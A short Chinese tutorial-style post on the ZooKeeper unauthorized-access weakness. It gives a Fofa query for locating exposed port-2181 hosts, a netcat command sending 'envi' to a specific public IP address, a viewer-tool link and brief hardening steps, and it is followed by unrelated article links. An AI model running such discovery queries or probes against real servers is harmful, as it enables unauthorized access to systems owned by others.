Zookeeper未授权访问漏洞

Zookeeper是分布式协同管理工具,常用来管理系统配置信息,提供分布式协同服务。Zookeeper的默认开放端口是2181。Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:kill命令)。攻击者能够执行所有只允许由管理员运行的命令。

漏洞利用

步骤一:使用以下Fofa语法搜索资产信息....

复制代码
port="2181"

步骤二:在Kali中使用以下命令进行未授权访问漏洞测试..

复制代码
echo envi | nc 106.227.19.24 2181

步骤三:可使用Zookeeper可视化管理工具进行连接....

复制代码
#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

漏洞修复

  1. 修改 ZooKeeper 默认端口,采用其他端口服务。
  2. 添加访问控制,配置服务来源地址限制策略。
  3. 增加 ZooKeeper 的认证配置。
相关推荐
大大大大晴天️44 分钟前
用 Helm、CRD 与 Operator 管大数据:声明式运维如何替代脚本化部署
大数据·云原生
LRL_2 小时前
深入浅出 Kubernetes 控制器:Deployment 与 StatefulSet 核心区别全景图
云原生·容器·kubernetes
想要打 Acm 的小周同学呀3 小时前
Kafka消息队列出现挤压如何解决?
分布式·kafka
MrSYJ3 小时前
Network Namespace 到底是个啥,别人再问你告诉他
docker·云原生·kubernetes
彬冷的心6 小时前
K8s 部署若依项目 + Harbor 私有仓库(双节点版)
云原生·容器·kubernetes
想要成为老金高手6 小时前
Kubernetes Service 深度实践:从 ClusterIP 到 Ingress 七层代理
云原生·容器·kubernetes
stark张宇7 小时前
分布式事务最全图解(6种方案):从强一致的2PC到最终对账,彻底搞懂数据一致性
分布式·后端
IT大白鼠7 小时前
Kubernetes 持久化存储:PV、PVC、StorageClass 存储体系
云原生·容器·kubernetes
会周易的程序员7 小时前
5Draft使用说明书
服务器·c++·分布式·raft·共识
富士康质检员张全蛋7 小时前
Kafka实战 自定义分区器 几种常见的分区器
分布式·kafka